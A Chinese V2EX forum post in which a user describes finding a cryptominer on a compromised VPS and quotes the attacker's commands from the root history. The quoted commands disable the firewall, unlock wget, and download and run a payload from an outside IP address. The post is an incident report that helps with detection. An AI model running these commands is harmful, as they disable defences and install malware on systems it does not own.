一不小心做了某币的矿工

今天同事说我服务怎么要 30 多秒才能打开，是不是哪儿有问题？
ssh 到 vps 上一看，原来 cpu 爆了，2 个莫名的进程占了将近 100%的 cpu，直接卡死
netstat 看了下，发现了一个奇怪的 ip, 163.172.204.213:8888, 果然有问题，
页面显示:
Mining server is Online for monero.crypto-pool.fr
访问了下 monero.crypto-pool.fr ，竟然做了某币矿工，套路啊套路。
看了下 root 的历史，异常命令如下

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
yum install -y wget
wget -c -P /etc/ http://111.73.45.188:9090/start
chmod 755 /etc/start
nohup /etc/start > /dev/null 2>&1 &

http://111.73.45.188:9090 页面如下:

不过想想这家伙要是不把 cpu 飙到 100，我还真不会注意，老哥猴车开得急了点了。
留帖以作纪念，有兴趣的同学可以看看这三个脚本是个啥原理

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/427585

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.